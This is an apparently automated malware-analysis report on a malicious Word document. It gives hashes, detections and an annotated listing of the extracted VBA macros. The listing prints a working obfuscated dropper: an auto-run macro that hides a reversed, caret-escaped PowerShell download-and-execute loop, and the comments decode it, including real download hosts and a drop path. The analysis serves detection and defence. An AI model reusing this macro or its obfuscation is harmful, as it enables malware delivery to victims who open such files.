Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef29e6287dca4497…

MALICIOUS

Office (OLE)

75.1 KB | Created: 2018-09-07 20:00:00 | Authoring application: Microsoft Office Word | First seen: 2018-10-07
MD5: 85b59e75ea6c26254708aef1b31d741e SHA-1: c30f095de249721e7e097e291d7614150c8256ef SHA-256: ef29e6287dca4497bbe3b1847de9b667e71f5abf97c5fe59f309d79af3b0943f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office (Word) document containing VBA macros. The 'Document_open' macro calls Shell() with a hidden window (vbHide) to run a command line that is assembled from several helper functions. The visible helper LkZObkLdh shows that the command starts with `cmd /V/C` and stores a PowerShell script, written backwards and padded with cmd.exe caret (^) escapes, inside a cmd variable; read backwards it builds a URL list via Split('@'), sets `$urb = $env:public + '\' + '660' + '.exe'`, and runs `foreach ($UFc in $LjJ) { try { $NNX.DownloadFile($UFc, $urb); Invoke-Item $urb; break } catch {} }` — a download-and-execute loop over a list of (presumably compromised) web sites. The ClamAV detection 'Doc.Dropper.Valyria-6680539-0' is consistent with this dropper behaviour. No specific family could be identified from static analysis alone; the extracted listing is truncated, so the complete URL list and the stub that re-reverses the script were not recovered.

Heuristics 5

  • ClamAV: Doc.Dropper.Valyria-6680539-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6680539-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace, not a network indicator. The real download URLs are hidden in the reversed, caret-obfuscated macro strings (see the extracted macro below) and are therefore not found by plain URL extraction; decode the macro before building IOCs.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6400 bytes
SHA-256: c3acee5d4900f4606352d171b672dba0ca017b6562eb03257433b5d685dd28f2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ujcOoPiYTWFV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: executes when the document is opened (the
' OLE_VBA_DOCOPEN finding above). No parameters, no return value.
Private Sub Document_open()
' Every runtime error from here on is silently ignored, so the junk
' Month() calls below can never abort the macro.
On _
Error _
Resume _
Next
   ' Junk/padding: Month() is given random text rather than a date; whatever
   ' error or meaningless value results is discarded. No effect on the payload.
   Month CStr("NpOnzIbW" + "jasWCuwVinif" + "M" + "cZiLSv")
   Month CStr("55541650" + "FE" + "AHEYV" + "AkNa")
   Month CStr("upRKS" + "fQwCbRPGuBimW")
' The payload. The command line is the concatenation of seven helpers
' (presumably all Functions in other modules; only LkZObkLdh and KsviEl are
' visible in this listing), run with window style vbHide (0) so no console
' is shown. LkZObkLdh shows the string begins with `cmd /V/C"` and carries a
' reversed, caret-obfuscated PowerShell download-and-execute script.
Shell CStr(FYuAjjzMc) + CStr(aiPEvFEm) + LkZObkLdh + KsviEl + DaSrItk + CStr(WtwqawpIWO) + CStr(KjcqRqRwdhiIP), CStr(vbHide)
   ' More junk calls after the Shell; same as above.
   Month CStr("176198505" + "2450" + "ta" + "QKKXS")
   Month CStr("210" + "9969" + "3757" + "6046")
End Sub



Attribute VB_Name = "SjaqjNcavLZ"
' Builds one chunk of the command line executed by Document_open and returns
' it as a String: ten fragments (zVORanoDl .. RSloZuuVj) concatenated in
' source order on the last assignment.
' Obfuscation used in this function:
'  (1) every literal is split into short pieces joined with "+";
'  (2) some characters come from Chr() over an arithmetic sum:
'      Chr(14 + 1 + 15 + 10 + 59) = Chr(99) = "c",
'      Chr(9 + 1 + 10 + 7 + 40)   = Chr(67) = "C",
'      Chr(4 + 0 + 4 + 3 + 23)    = Chr(34) = the double-quote character;
'  (3) "^" is sprinkled through the text -- cmd.exe treats ^ as an escape
'      character and drops it, so the carets break signature matching
'      without changing what runs;
'  (4) with the carets removed the fragments read backwards (hctac -> catch,
'      kaerb -> break, metI-ekovnI -> Invoke-Item, eliFdaolnwoD ->
'      DownloadFile, cilbup:vne$ -> $env:public): the PowerShell script is
'      stored reversed inside a cmd variable. The code that re-reverses and
'      launches it is not in this function (presumably one of the other
'      helpers concatenated on the Shell line).
' Reading the ten fragments backwards (carets stripped) gives:
'   olio.com/KP7OVR5z@http://allstateelectrical.contractors/5rVKD4ajRO'
'   .Split('@');$iDt = '660';$urb=$env:public+'\'+$iDt+'.exe';
'   foreach($UFc in $LjJ){try{$NNX.DownloadFile($UFc, $urb);
'   Invoke-Item $urb;break;}catch{}}
' i.e. download from a URL list to %PUBLIC%\660.exe and run it; the start of
' the URL list and the $LjJ/$NNX definitions lie in the helpers that follow.
Function LkZObkLdh()

' Errors from the junk Month() calls below are silently ignored.
On _
Error _
Resume _
Next
Month CStr("106756242" + "YCb" + "5167" + "4511")
   Month CStr("zR" + "l" + "2670" + "337497072")
' Decodes to: cmd /V/C"^s^e^t Zg7=<padding>^}^}{^hc^t^ac};^
' -> cmd.exe with delayed variable expansion (/V), running `set Zg7=...`;
'    the value, read backwards, is the script's tail ";}catch{}}" plus spaces.
zVORanoDl = Chr(14 + 1 + 15 + 10 + 59) + "md /" + "V/" + Chr(9 + 1 + 10 + 7 + 40) + Chr(4 + 0 + 4 + 3 + 23) + "^s^e^t" + " Zg7=" + "    " + " ^ ^ ^ " + "^ ^  ^ " + "^ " + "  ^  ^}" + "^}{" + "^h" + Chr(14 + 1 + 15 + 10 + 59) + "^t^a" + Chr(14 + 1 + 15 + 10 + 59) + "}" + ";^"
Month CStr("159" + "uKt")
   Month CStr("aDCTvWHHrm" + "fkO" + "146343771" + "wKL")
   Month CStr("101249983" + "JHXCJaFjGQAara")
   Month CStr("hEcDT" + "9262" + "107278517" + "VZGX")
' Reversed: $urb);Invoke-Item $urb;break
tiJTnw = "k^a" + "^er^b;b" + "r^u$^ m" + "e^" + "t" + "I-ekov" + "nI;" + ")^" + "br^u^$"
Month CStr("3097" + "215574324")
   Month CStr("bYS" + "zJVRXAamm")
   Month CStr("500585246" + "7347" + "D" + "4914")
   Month CStr("8369" + "w" + "165388901" + "lbkurwSEnZO")
' Reversed: y{$NNX.DownloadFile($UFc,   (the "y" completes "try" below)
jjQLoUCuJn = "^" + " ," + Chr(14 + 1 + 15 + 10 + 59) + "F" + "^U^$(" + "eliF" + "^da^o^" + "lnw^o" + "^D." + "^XNN${^" + "y"
Month CStr("175478037" + "3644")
' Reversed: foreach($UFc in $LjJ){tr
qtzSMBMca = "r^t^{" + ")J^jL^$" + "^ n" + "i^ " + Chr(14 + 1 + 15 + 10 + 59) + "^F^U" + "$(^" + "h" + Chr(14 + 1 + 15 + 10 + 59) + "aero" + "f"
Month CStr("MiWd" + "342098992" + "NH" + "491321784")
' Reversed: \'+$iDt+'.exe';
hGBKu = "^;" + "'^exe.'" + "^+t^" + "D^i$^+^" + "'" + "^\^"
Month CStr("CEpQBsfRz" + "228597851" + "VNaKIE" + "IAT")
   Month CStr("233023910" + "ILoOAjd")
   Month CStr("MVG" + "z" + "356565027" + "178147658")
   Month CStr("9764" + "jl" + "qwC" + "wNQbTYh")
' Reversed: );$iDt = '660';$urb=$env:public+'   -> drop path %PUBLIC%\660.exe
vRlzFlSl = "'+" + Chr(14 + 1 + 15 + 10 + 59) + "i^lb^u^" + "p:v" + "n^e" + "$^=^br" + "^u$;" + "^'0^" + "6^6^" + "'^ = t" + "D^i$^;)"
Month CStr("oVDB" + "wdc")
' Reversed: '.Split('@'   -> the URL list is an '@'-separated string
mWPnQVUmZB = "^'" + "@^'(" + "^til^pS" + "^" + "." + "'^"
Month CStr("6076" + "mG" + "bHmzpifNzHQ" + "jhi")
   Month CStr("8736" + "274070288" + "6414" + "8025")
' Reversed: electrical.contractors/5rVKD4ajRO   (URL path fragment)
FKGOAjPH = "OR^ja^" + "4^DKVr^" + "5/" + "^sro^t" + Chr(14 + 1 + 15 + 10 + 59) + "^artno" + Chr(14 + 1 + 15 + 10 + 59) + ".l^a" + Chr(14 + 1 + 15 + 10 + 59) + "i" + "rt" + Chr(14 + 1 + 15 + 10 + 59) + "e^le"
Month CStr("520308106" + "jkLt")
   Month CStr("PLlz" + "ZM")
' Reversed: @http://allstate   (URL separator + start of next host)
ZHzMaiaTw = "^e^ta^t" + "^s^" + "l^la//^" + ":p^" + "t^t^h" + "@"
Month CStr("7800" + "zRAKwHbV")
   Month CStr("ni" + "NGAYJqzk" + "CQqoQl" + "6184")
   Month CStr("7108" + "dMvuJConaB" + "250809323" + "NQCaS")
   Month CStr("426395423" + "jiE")
' Reversed: olio.com/KP7OVR5z   (tail of a host + path; host start is in a
' later helper)
RSloZuuVj = "z5R" + "VO" + "^7" + "P^K/" + "^m^" + "o" + Chr(14 + 1 + 15 + 10 + 59) + ".^o^il" + "^o"
' Return value: the ten fragments joined in source order.
LkZObkLdh = zVORanoDl + tiJTnw + jjQLoUCuJn + qtzSMBMca + hGBKu + vRlzFlSl + mWPnQVUmZB + FKGOAjPH + ZHzMaiaTw + RSloZuuVj
   Month CStr("imAzkfN" + "4143" + "255296229" + "oNjw")
End Function
Function KsviEl()

On _
Error _
Resume _
Next
Month CStr("hpin" + "s" + "303103539" + "317284753")
   Month CStr("460604133" + "6481")
DjOIWILqa = "f" + "t" + "r^opv" + "e" + "w.^" + "i^l^" + "e" + Chr(14 + 1 + 15 + 10 + 59) + "n"
Month CStr("322188019" + "857" + "XCDaQzf" + "504105327")
hfpvOv = "efe^lb" + "^" + "a^i" + "^ler//" + ":^ptt^h" + "^" + "@g" + "^U^3" + "NZr^i" + "^1^" + "wj/" + "ku^."
Month CStr("UL" + "176118507" + "319836499" + "206203513")
   Month CStr("j" + "281291252")
   Month CStr("wb" + "3473")
zzNzHR = "^o" + Chr(14 + 1 + 15 + 10 + 59) + ".eni" + "^lno" + "-^esab^" + "-tsr^if" + "//" + "^:^p^t^" + "th^"
... (truncated)